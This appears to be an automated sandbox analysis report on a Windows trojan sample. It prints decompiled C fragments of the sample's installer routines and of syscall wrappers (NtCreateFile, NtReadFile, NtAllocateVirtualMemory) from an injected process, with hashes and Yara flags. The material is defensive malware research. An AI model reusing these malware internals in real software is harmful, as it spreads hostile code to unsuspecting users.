                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                          • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004058EC(CHAR* _a4) {
                                                          				struct _PROCESS_INFORMATION _v20;
                                                          				int _t7;
                                                          
                                                          				0x42c0c0->cb = 0x44;
                                                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
                                                          				if(_t7 != 0) {
                                                          					CloseHandle(_v20.hThread);
                                                          					return _v20.hProcess;
                                                          				}
                                                          				return _t7;
                                                          			}





                                                          0x004058f5
                                                          0x00405915
                                                          0x0040591d
                                                          0x00405922
                                                          0x00000000
                                                          0x00405928
                                                          0x0040592c

                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                          • CloseHandle.KERNEL32(?), ref: 00405922
                                                          Strings
                                                          • Error launching installer, xrefs: 004058FF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                          • Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
                                                          • Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                          • Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405C2C(char* _a4) {
                                                          				char* _t3;
                                                          				char* _t5;
                                                          
                                                          				_t5 = _a4;
                                                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                          				while( *_t3 != 0x5c) {
                                                          					_t3 = CharPrevA(_t5, _t3);
                                                          					if(_t3 > _t5) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				 *_t3 =  *_t3 & 0x00000000;
                                                          				return  &(_t3[1]);
                                                          			}





                                                          0x00405c2d
                                                          0x00405c37
                                                          0x00405c39
                                                          0x00405c40
                                                          0x00405c48
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c48
                                                          0x00405c4a
                                                          0x00405c4f

                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,80000000,00000003), ref: 00405C32
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe,80000000,00000003), ref: 00405C40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1669384263
                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E740D10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                          				char* _t17;
                                                          				char _t19;
                                                          				void* _t20;
                                                          				void* _t24;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				void* _t40;
                                                          				signed int _t43;
                                                          				void* _t52;
                                                          				char* _t53;
                                                          				char* _t55;
                                                          				void* _t56;
                                                          				void* _t58;
                                                          
                                                          				 *0x740d405c = _a8;
                                                          				 *0x740d4060 = _a16;
                                                          				 *0x740d4064 = _a12;
                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x740d4038, E740D1556, _t52);
                                                          				_t43 =  *0x740d405c +  *0x740d405c * 4 << 2;
                                                          				_t17 = E740D123B();
                                                          				_a8 = _t17;
                                                          				_t53 = _t17;
                                                          				if( *_t17 == 0) {
                                                          					L16:
                                                          					return GlobalFree(_a8);
                                                          				} else {
                                                          					do {
                                                          						_t19 =  *_t53;
                                                          						_t55 = _t53 + 1;
                                                          						_t58 = _t19 - 0x6c;
                                                          						if(_t58 > 0) {
                                                          							_t20 = _t19 - 0x70;
                                                          							if(_t20 == 0) {
                                                          								L12:
                                                          								_t53 = _t55 + 1;
                                                          								_t24 = E740D1266(E740D12AD( *_t55 - 0x30));
                                                          								L13:
                                                          								GlobalFree(_t24);
                                                          								goto L14;
                                                          							}
                                                          							_t27 = _t20;
                                                          							if(_t27 == 0) {
                                                          								L10:
                                                          								_t53 = _t55 + 1;
                                                          								_t24 = E740D12D1( *_t55 - 0x30, E740D123B());
                                                          								goto L13;
                                                          							}
                                                          							L7:
                                                          							if(_t27 == 1) {
                                                          								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                          								 *_t31 =  *0x740d4030;
                                                          								 *0x740d4030 = _t31;
                                                          								E740D1508(_t31 + 4,  *0x740d4064, _t43);
                                                          								_t56 = _t56 + 0xc;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						if(_t58 == 0) {
                                                          							L17:
                                                          							_t34 =  *0x740d4030;
                                                          							if( *0x740d4030 != 0) {
                                                          								E740D1508( *0x740d4064, _t34 + 4, _t43);
                                                          								_t37 =  *0x740d4030;
                                                          								_t56 = _t56 + 0xc;
                                                          								GlobalFree(_t37);
                                                          								 *0x740d4030 =  *_t37;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						_t39 = _t19 - 0x4c;
                                                          						if(_t39 == 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t40 = _t39 - 4;
                                                          						if(_t40 == 0) {
                                                          							 *_t55 =  *_t55 + 0xa;
                                                          							goto L12;
                                                          						}
                                                          						_t27 = _t40;
                                                          						if(_t27 == 0) {
                                                          							 *_t55 =  *_t55 + 0xa;
                                                          							goto L10;
                                                          						}
                                                          						goto L7;
                                                          						L14:
                                                          					} while ( *_t53 != 0);
                                                          					goto L16;
                                                          				}
                                                          			}


















                                                          0x740d10e7
                                                          0x740d10ef
                                                          0x740d1103
                                                          0x740d110b
                                                          0x740d1116
                                                          0x740d1119
                                                          0x740d1121
                                                          0x740d1124
                                                          0x740d1126
                                                          0x740d11c4
                                                          0x740d11d0
                                                          0x740d112c
                                                          0x740d112d
                                                          0x740d112d
                                                          0x740d1130
                                                          0x740d1131
                                                          0x740d1134
                                                          0x740d1203
                                                          0x740d1206
                                                          0x740d119e
                                                          0x740d11a4
                                                          0x740d11ac
                                                          0x740d11b1
                                                          0x740d11b4
                                                          0x00000000
                                                          0x740d11b4
                                                          0x740d1209
                                                          0x740d120a
                                                          0x740d1186
                                                          0x740d118c
                                                          0x740d1194
                                                          0x00000000
                                                          0x740d1194
                                                          0x740d1152
                                                          0x740d1153
                                                          0x740d115b
                                                          0x740d1168
                                                          0x740d1170
                                                          0x740d1179
                                                          0x740d117e
                                                          0x740d117e
                                                          0x00000000
                                                          0x740d1153
                                                          0x740d113a
                                                          0x740d11d1
                                                          0x740d11d1
                                                          0x740d11d8
                                                          0x740d11e5
                                                          0x740d11ea
                                                          0x740d11ef
                                                          0x740d11f5
                                                          0x740d11fb
                                                          0x740d11fb
                                                          0x00000000
                                                          0x740d11d8
                                                          0x740d1140
                                                          0x740d1143
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1149
                                                          0x740d114c
                                                          0x740d119b
                                                          0x00000000
                                                          0x740d119b
                                                          0x740d114f
                                                          0x740d1150
                                                          0x740d1183
                                                          0x00000000
                                                          0x740d1183
                                                          0x00000000
                                                          0x740d11ba
                                                          0x740d11ba
                                                          0x00000000
                                                          0x740d11c3

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211149237.00000000740D1000.00000020.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                          • Associated: 00000001.00000002.211137968.00000000740D0000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211158192.00000000740D3000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211175377.00000000740D5000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: b9d22bb4bd1425d8a2428633318919a214ff7c89a9b81a43a2a69e2f2fa85c67
                                                          • Instruction ID: 7beb98fca74bc83981e22b89cf8ebc741ce59b6720833a6fc5d06bfbc657a195
                                                          • Opcode Fuzzy Hash: b9d22bb4bd1425d8a2428633318919a214ff7c89a9b81a43a2a69e2f2fa85c67
                                                          • Instruction Fuzzy Hash: 6331D5B6618344AFE7018F76D948B697FF9EB89A40B244165EC46CA212DF34CA1CCF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                          				int _v8;
                                                          				int _t12;
                                                          				int _t14;
                                                          				int _t15;
                                                          				CHAR* _t17;
                                                          				CHAR* _t27;
                                                          
                                                          				_t12 = lstrlenA(_a8);
                                                          				_t27 = _a4;
                                                          				_v8 = _t12;
                                                          				while(lstrlenA(_t27) >= _v8) {
                                                          					_t14 = _v8;
                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                          					if(_t15 == 0) {
                                                          						_t17 = _t27;
                                                          					} else {
                                                          						_t27 = CharNextA(_t27);
                                                          						continue;
                                                          					}
                                                          					L5:
                                                          					return _t17;
                                                          				}
                                                          				_t17 = 0;
                                                          				goto L5;
                                                          			}









                                                          0x00405d5b
                                                          0x00405d5d
                                                          0x00405d60
                                                          0x00405d8c
                                                          0x00405d65
                                                          0x00405d6e
                                                          0x00405d73
                                                          0x00405d7e
                                                          0x00405d81
                                                          0x00405d9d
                                                          0x00405d83
                                                          0x00405d8a
                                                          0x00000000
                                                          0x00405d8a
                                                          0x00405d96
                                                          0x00405d9a
                                                          0x00405d9a
                                                          0x00405d94
                                                          0x00000000

                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                          • CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                          • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                          • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                          • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          APIs
                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: R=A$R=A
                                                          • API String ID: 2738559852-3742021989
                                                          • Opcode ID: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                          • Instruction ID: d3105f4d5f75fa6480941d81b4b8bd581525c59bab21666af283b4685eccbe10
                                                          • Opcode Fuzzy Hash: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                          • Instruction Fuzzy Hash: D3F0EC71200108AFCB04DF89DC80DEB77ADAF8C714F158258BE1D97241CA30E8518BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                          				void* _t18;
                                                          				void* _t27;
                                                          				intOrPtr* _t28;
                                                          
                                                          				_t13 = _a4;
                                                          				_t28 = _a4 + 0xc48;
                                                          				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                          				_t6 =  &_a32; // 0x413d52
                                                          				_t12 =  &_a8; // 0x413d52
                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                          				return _t18;
                                                          			}






                                                          0x00418273
                                                          0x0041827f
                                                          0x00418287
                                                          0x00418292
                                                          0x004182ad
                                                          0x004182b5
                                                          0x004182b9

                                                          APIs
                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: R=A$R=A
                                                          • API String ID: 2738559852-3742021989
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 35%
                                                          			E0041817A(void* __ebx, long __ecx, void* __edx, void* _a1, intOrPtr _a4, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40) {
                                                          				signed char _t20;
                                                          				long _t25;
                                                          				void* _t45;
                                                          				void* _t46;
                                                          				intOrPtr* _t48;
                                                          				long _t50;
                                                          
                                                          				asm("stc");
                                                          				if(__ecx >=  *((intOrPtr*)(__edx + 0x53))) {
                                                          					 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ __ecx;
                                                          					asm("adc al, 0x52");
                                                          					_t25 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __ecx, _t20 ^ 0x0000008b, _t50); // executed
                                                          					return _t25;
                                                          				} else {
                                                          					_t26 = _a4;
                                                          					_t4 = _t26 + 0xc3c; // 0xc64
                                                          					_t48 = _t4;
                                                          					E00418DC0(_t45, _a4, _t48,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x27);
                                                          					return  *((intOrPtr*)( *_t48))(_a8, _a12, _a16, _a20, _a24, _t46, _t50);
                                                          				}
                                                          			}









                                                          0x0041817a
                                                          0x0041817e
                                                          0x004181e1
                                                          0x004181e7
                                                          0x0041820d
                                                          0x00418211
                                                          0x00418180
                                                          0x00418183
                                                          0x0041818f
                                                          0x0041818f
                                                          0x00418197
                                                          0x004181b9
                                                          0x004181b9

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                          • Instruction ID: 89afb2f1cf6171b8558e0c7e0ca09a0a510f862957134e4a4b828be0d8d9e918
                                                          • Opcode Fuzzy Hash: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                          • Instruction Fuzzy Hash: BF11E2B2204209BBCB08CF98DC84DEB77ADAF8C754B15864DFA5D97241CA30E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E004181C0(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
                                                          				void* _v3;
                                                          				intOrPtr _t15;
                                                          				signed char _t16;
                                                          				long _t21;
                                                          				long _t23;
                                                          				void* _t31;
                                                          				long _t33;
                                                          
                                                          				_t15 = _a4;
                                                          				_t23 =  *(_t15 + 0x10);
                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                          				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
                                                          				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
                                                          				asm("adc al, 0x52");
                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t33); // executed
                                                          				return _t21;
                                                          			}










                                                          0x004181c3
                                                          0x004181c6
                                                          0x004181cf
                                                          0x004181d7
                                                          0x004181e1
                                                          0x004181e7
                                                          0x0041820d
                                                          0x00418211

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E004181BA(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
                                                          				void* _v3;
                                                          				intOrPtr _t15;
                                                          				signed char _t16;
                                                          				long _t21;
                                                          				long _t23;
                                                          				void* _t31;
                                                          				long _t36;
                                                          				long _t39;
                                                          
                                                          				asm("adc esp, [edi+eax*8+0x55749e0c]");
                                                          				_t36 = _t39;
                                                          				_t15 = _a4;
                                                          				_t23 =  *(_t15 + 0x10);
                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                          				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
                                                          				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
                                                          				asm("adc al, 0x52");
                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t36); // executed
                                                          				return _t21;
                                                          			}











                                                          0x004181ba
                                                          0x004181c1
                                                          0x004181c3
                                                          0x004181c6
                                                          0x004181cf
                                                          0x004181d7
                                                          0x004181e1
                                                          0x004181e7
                                                          0x0041820d
                                                          0x00418211

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                          • Instruction ID: fae6ffa33bf77168ea0cd424f9f4fd6a4ef7e0647b005e22d2a95e62c3cf46de
                                                          • Opcode Fuzzy Hash: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                          • Instruction Fuzzy Hash: 4E01A4B2211108ABCB48CF89DC95DEB77A9EF8C754F158248FA1997241D630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                          				long _t14;
                                                          				void* _t21;
                                                          
                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                          				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                          				return _t14;
                                                          			}





                                                          0x004183af
                                                          0x004183b7
                                                          0x004183d9
                                                          0x004183dd

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E004182F0(void* __esi, intOrPtr _a4, void* _a8) {
                                                          				long _t8;
                                                          				void* _t11;
                                                          
                                                          				_t5 = _a4;
                                                          				_t2 = _t5 + 0x10; // 0x300
                                                          				_t3 = _t5 + 0xc50; // 0x409743
                                                          				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                          				_t8 = NtClose(_a8);
                                                          				asm("rcr byte [esi+0x5d], 1");
                                                          				return _t8;
                                                          			}





                                                          0x004182f3
                                                          0x004182f6
                                                          0x004182ff
                                                          0x00418307
                                                          0x00418315
                                                          0x00418316
                                                          0x00418319

                                                          APIs
                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.212088077.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
